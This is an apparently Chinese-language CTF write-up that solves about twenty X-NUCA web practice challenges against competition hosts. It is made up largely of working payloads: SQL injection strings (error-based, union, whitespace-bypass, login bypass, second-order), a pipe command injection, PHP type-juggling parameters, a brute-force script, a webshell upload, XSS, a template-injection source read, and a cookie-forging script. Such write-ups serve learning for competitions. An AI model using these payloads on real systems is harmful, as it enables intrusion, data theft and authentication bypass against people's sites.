X-NUCA Web

1. Web4

<?php
show_source(__FILE__);
$v1=0;$v2=0;$v3=0;
$a=(array)json_decode(@$_GET['foo']);
var_dump($a);
if(is_array($a)){
    echo 1;
    is_numeric(@$a["bar1"])?die("nope"):NULL;
    if(@$a["bar1"]){
        ($a["bar1"]>2016)?$v1=1:NULL;
    }
    if(is_array(@$a["bar2"])){
        if(count($a["bar2"])!==5 OR !is_array($a["bar2"][0])) die("nope");
        $pos = array_search("nudt", $a["a2"]);
        $pos===false?die("nope"):NULL;
        foreach($a["bar2"] as $key=>$val){
            $val==="nudt"?die("nope"):NULL;
        }
        $v2=1;
    }
}
$c=@$_GET['cat'];
$d=@$_GET['dog'];
if(@$c[1]){
    if(!strcmp($c[1],$d) && $c[1]!==$d){
        eregi("3|1|c",$d.$c[0])?die("nope"):NULL;
        strpos(($c[0].$d), "htctf2016")?$v3=1:NULL;
    }
}
if($v1 && $v2 && $v3){
    include "flag.php";
    echo $flag;
}
?>
本地测试程序：
	<?php
	show_source(__FILE__);
	$arr = array (
    	"bar1"=>"2017adsad",
    	"bar2"=>array(
        	"0"=>array(0),
        	"1"=>1,
        	"2"=>2,
        	"3"=>3,
        	"4"=>4,
    	),
    	"a2"=>"nudt",
    	"d"=>4,
    	"e"=>5);
	echo json_encode($arr);


	$v1=0;$v2=0;$v3=0;
	$a=(array)json_decode(@$_GET['foo']);
	var_dump($a);
	if(is_array($a)){
    	echo 'lever 1!';
    	is_numeric(@$a["bar1"])?die("nope"):NULL;
    	if(@$a["bar1"]){
        	($a["bar1"]>2016)?$v1=1:NULL;
    	}
    	if(is_array(@$a["bar2"])){
        	echo 'lever 2!';
        	var_dump($a["bar2"]);
        	echo(count($a["bar2"]));
        	if(count($a["bar2"])!==5 OR !is_array($a["bar2"][0])) die("nope");
        	echo 'lever 3!';
        	$pos = array_search("nudt", $a["a2"]);
        	$pos===false?die("nope"):NULL;
        	echo 'lever 4!';
        	foreach($a["bar2"] as $key=>$val){
            	$val==="nudt"?die("nope"):NULL;
        	}
        	$v2=1;
    	}
	}
	$c=@$_GET['cat'];
	$d=@$_GET['dog'];
	var_dump($c[1]);
	var_dump(strcmp($c[1],$d));
	var_dump($c[1]!==$d);
	var_dump((!strcmp($c[1],$d) && $c[1]!==$d));
	if(@$c[1]){
    	echo 'lever 5!';
    	if(!strcmp($c[1],$d) && $c[1]!==$d){
        	echo 'lever 6!';
        	eregi("3|1|c",$d.$c[0])?die("nope"):NULL;
        	echo 'lever 7!';
        	strpos(($c[0].$d), "htctf2016")?$v3=1:NULL;

    	}
	}
	var_dump($v1);
	var_dump($v2);
	var_dump($v3);

	if($v1 && $v2 && $v3){
    	include "flag.php";
    	echo $flag;
	}

	?>
payload :
http://localhost:8888/sys/test.php?foo={"bar1":"2017adsad","bar2":[[0],1,2,3,4],"c":3,"d":4,"e":5}&&cat[1][]="1"&&dog=％00&&cat[0]="htctf2016"

Web5

slash+3位数字

爆破一下

#!usr/bin/python
# -*- coding:utf-8 -*-
__Author__ = 'moxiaoxi'
__Filename__ = 'brute.py' 

'''
爆破
'''
import hashlib
from urllib import request
diction = {}
l = []
url = []
for x in range(10):
    diction[x]=str(x)

for x in range(10):
    for i in range(10):
        for j in range(10):
            l.append('slash'+diction[x]+diction[i]+diction[j]) 

for i in range(1000):
    md5 = hashlib.md5()
    md5.update(l[i].encode('utf-8'))
    url.append("http://218.76.35.75:20115/index.php?page="+md5.hexdigest())
    print("test %d "%i)
    with request.urlopen(url[i]) as test:
        if '文件不存在' not in test.read().decode('utf-8'):
            print('Yep, We got it ! test:%d:'%i+url[i])
            break
            

http://218.76.35.75:20115/index.php?page=b74d94c647115ba40b3acd8e12b4e122

Web6

Referer: http://218.76.35.75:20121/’+(updatexml(1,concat(0x3a,(select (select flag from flag))),1))+’1

Web7

上传一个PHP文件，然后用burpsuite改下类型就可以了

Web8

把JS编译一下，查看源码就能看到

访问一下，有个cookie，就是flag

Web 9

http://218.76.35.75:20124/index.php?heetian=he=abcd

Web10

描述：alert document.domain

闭合以后，用img标签XSS

Web 11

无聊的题目

http://218.76.35.75:20126/index.php?page=/flag 得到flag位置 flag: 62a72cb2f3d5e7fc0284da9f21e66c9f.php

访问一下就得到了 guess 573

完全不能叫做文件包含。

Web12

又一道爆破题

cookie 那边 user改成admin

guess 用burpsuite爆破一下

就出来最终结果

Web 13

http://218.76.35.75:20101/?name=guest’ union select (select flag from flag),2,3%23

Web14

上传个一句话木马图片即可

Web15

使用|绕过 127.0.0.1｜ls

可以得到 3f83e03a1e4e65573ef11cca25048808 css footer.php header.php index.php

访问下http://218.76.35.75:20105/3f83e03a1e4e65573ef11cca25048808/得到flag

Web16

其实并没有看懂这题到底什么意思

   if (this.scores.length < this.maxscores) return 1000000 < a && (a = new 
   p, a.set('urlkey', 'webqwer'[1] + '100.js', 86400000)),

js中有一个这样的代码

获取对应文件

http://218.76.35.74:65380/e100.js

可以得到一个js的混淆奇怪的代码在console中输入得到flag

flag{oT0yTrjU0xhjhj2YTcT8jljMWpzS9tDk}

Web 17

POST / HTTP/1.1
Host: 218.76.35.74:65280
Content-Length: 13
Cache-Control: max-age=0
Origin: http://218.76.35.74:65280
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://www.iie.ac.cn 
X-Forwarded-For:10.10.20.1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Connection: close

password=cafe

Web 18

搜下kindeditor漏洞

其实是路径泄漏

http://218.76.35.74:65180/kindeditor/php/file_manager_json.php?path=./

找到flag地址 http://218.76.35.74:65180/kindeditor/attached/flag_clue.php

得到一个倒置的base64 倒置下，解码即可

Python 2.7.11 (default, Dec 16 2015, 11:23:08) 
[GCC 4.2.1 Compatible Apple LLVM 7.0.0 (clang-700.1.76)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> s="=0nYvpEdhVmcnFUZu9GRlZXd7pzZhxmZ"
>>> print s[::-1]
ZmxhZzp7dXZlRG9uZUFncmVhdEpvYn0=
>>> import base64
>>> print base64.b64decode("ZmxhZzp7dXZlRG9uZUFncmVhdEpvYn0="
... )
flag:{uveDoneAgreatJob}
>>> 

Web 19

一开始用githack恢复，没找到点

后来发现这题的关键是需要拿到git参数文件

就是得拿到git配置文件

用rip-git.pl 抓取文件

然后，git log 一下可以发现有两个记录

git reset –hard 570fa7812efa63a398471e48d51bf24eeaa99358(init)

再查看hack.php就找到了flag

Web 20

flask注入。。。

试探了好久，还是没找到flag

后来，队友提醒，其实是个源码泄漏

先使网页报错，报错页面有一个这样的代码：

def get_user_file(f_name):
    if(f_name =='473bfa63bfeb1e673d6d151a799af923.py'):
        with open(f_name) as f:
            return f.readlines()

然后，用get_user_file获取下这个文件

GET /?data=sleep\{\{get_user_file('473bfa63bfeb1e673d6d151a799af923.py')\}\} HTTP/1.1
Host: 218.76.35.75:20102
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://218.76.35.75:20102/?data=sleep
Cookie: PHPSESSID=ckn46fftq7a54hue8klnjh2646
Connection: close

Web 21

view-source:http://218.76.35.75:20106/index.php?image=index.php 看到base64编码的代码，反解一下得到index.php的源码

<?php
/**
 * Created by PhpStorm.
 * User: pfven
 * Date: 2016/7/20
 * Time: 21:35
 */
include 'header.php';
if(isset($_GET["image"])){
    $file = $_GET['image'];
    $file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
    $file = str_replace("config","_", $file);
    $txt = base64_encode(file_get_contents($file));

    echo "<img src='data:image/png;base64,".$txt."'></img>";
}else {
     header("Location: index.php?image=heihei.jpg");

    exit();
}

include 'footer.php';
//***

一直卡在这，没找到点。后来看了官方给的提示，简直了，phpstorm的源码泄漏问题

即使用Phpstorm会自动生成一个文件夹.idea

翻一下目录http://218.76.35.75:20106/.idea/misc.xml

<component name="editorHistoryManager">
<entry file="file://$PROJECT_DIR$/function_crypt.php">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="412">
<caret line="54" column="20" selection-start-line="54" selection-start-column="20" selection-end-line="54" selection-end-column="20"/>
<folding/>
</state>

可以找到上述的代码和题干的自加密联系起来。

把function_crypt.php源码读取出来

访问http://218.76.35.75:20106/index.php?image=functionconfigcrypt.php(注意过滤)

<?php
/**
 * Created by PhpStorm.
 * User: pfven
 * Date: 2016/7/20
 * Time: 17:19
 */

error_reporting(E_ALL || ~E_NOTICE);
include('config.php');
function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++)	{
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}

function encrypt($txt,$key){
    for($i=0;$i<strlen($txt);$i++){
        $tmp .= chr(ord($txt[$i])+10);
    }
    $txt = $tmp;
    $rnd=random(4);
    $key=md5($rnd.$key);
    $s=0;
    for($i=0;$i<strlen($txt);$i++){
        if($s == 32) $s = 0;
        $ttmp .= $txt[$i] ^ $key[++$s];
    }
    return base64_encode($rnd.$ttmp);
}
function decrypt($txt,$key){
    $txt=base64_decode($txt);
    $rnd = substr($txt,0,4);
    $txt = substr($txt,4);
    $key=md5($rnd.$key);

    $s=0;
    for($i=0;$i<strlen($txt);$i++){
        if($s == 32) $s = 0;
        $tmp .= $txt[$i]^$key[++$s];
    }
    for($i=0;$i<strlen($tmp);$i++){
        $tmp1 .= chr(ord($tmp[$i])-10);
    }
    return $tmp1;
}

$username = decrypt($_COOKIE['user'],$key);
if ($username == 'system'){
    echo $flag;
}else{
    setcookie('user',encrypt('guest',$key));
    echo "It's Works!";
}

官方给的解密代码

function ss($txt,$m){
        for($i=0;$i<strlen($m);$i++){
        $tmp .= chr(ord($m[$i])+10);
    }
        $m=$tmp;
        $tmp='';
    $txt=base64_decode($txt);
    $rnd = substr($txt,0,4);
    $txt = substr($txt,4);
    for($i=0;$i<strlen($txt);$i++){
        $key .= $txt[$i] ^ $m[$i];
    }
    $s='0123456789abcdef';
    $txt1='system';
        for($i=0;$i<strlen($txt1);$i++){
        $tmp .= chr(ord($txt1[$i])+10);
    }
        $txt1=$tmp;
        $tmp='';
    for($i=0;$i<16;$i++){
        $tmp = $key.$s[$i];
        for($ii=0;$ii<strlen($txt1);$ii++){
            $txt2 .= $txt1[$ii] ^ $tmp[$ii];
        }
        file_put_contents('1.txt',base64_encode($rnd.$txt2)."\r\n",FILE_APPEND);   
        $txt2='';
        
    }
}
ss('eldUVRdOWRhI','guest'); // 设置获取的guest用户的cookie值。

这个生成了16个加密的密文，用burp加载后，跑一遍，即可得到flag 。

Web 22

脑洞题… shell[pass]=asdfasdf&shell[_SESSION][login]=asd&shell[login]=false

参考：http://bbs.heetian.com/forum.php?mod=viewthread&tid=29

Web 23

POST / HTTP/1.1
Host: 218.76.35.75:20108
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://218.76.35.75:20108/
Cookie: PHPSESSID=ufc8ipcufou5efg86pk3r4v2r4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

username=admin'+and+(left(database(),5)='web18')+and+'1'='1&password=123

得到数据库 web18

后来，无意中看了下robots.txt 可以看到一个哈希文件夹乱七八糟的脑洞题…里面有个upload.php 文件泄漏了index.php的源码

    if ((isset($_POST['username'])&&isset($_POST['password'])))
    {
        try
        {
            $user=trim(str_replace(" ","",$_POST['username']));
            $user=str_replace("*","",$user);
            $user=str_replace(";","",$user);
            $user=str_replace("#","",$user);
            $user=str_replace("\r","",$user);
            $user=str_replace("\n","",$user);
            $user=str_replace(urldecode("%09"),"",$user);
            $user=str_replace(urldecode("%0b"),"",$user);
            $user=str_replace(urldecode("%0c"),"",$user);
            $user=str_replace(urldecode("%0d"),"",$user);


            $pwd=md5($_POST['password']);
            $query="SELECT password FROM admin WHERE username='".$user."'";

            $result=$pdo->query($query);
            if ($result!=null&&$result->rowCount()!==0)
            {
                while($row = $result->fetch())
                {
                    if ($row['password']===$pwd)
                        echo $flag;
                    else
                    {
                        echo '<div class="alert alert-error"> <a class="close" data-dismiss="alert">×</a><strong>密码错误</strong></div>';
                    }
                }
            }

username=admind’%a0union%a0select%a0’4124bc0a9335c27f086f24ba207a4912’%a0from%a0admin%a0where%a0’1’=’1&password=aa

Web 24

脑残出题人题目改来改去

一开始没有登录界面。。。

访问下http://218.76.35.75:20116/flagishere/ 有个登录框

万能密码绕过

有waf,但是没过滤’和｜｜用户名 admin 密码’||’1’=’1 Your Flag:flag{s0e4sy_sq1i:)}

Web 25

1、.index.php.swp源码泄露

2、注入点id是被is_numeric过滤后，插入到vote表里的，可以用十六进制或者二进制绕过is_numeric,把注入查询语句插入到vote表里，然后又从vote表里取出，形成二次注入

3、猜解t_flag表，使用GROUP_CONCAT(flag)取flag

参考：

比赛题目：http://www.hetianlab.com/pages/activity/X-NUCANationalTL.jsp

X-NUCA Web练习题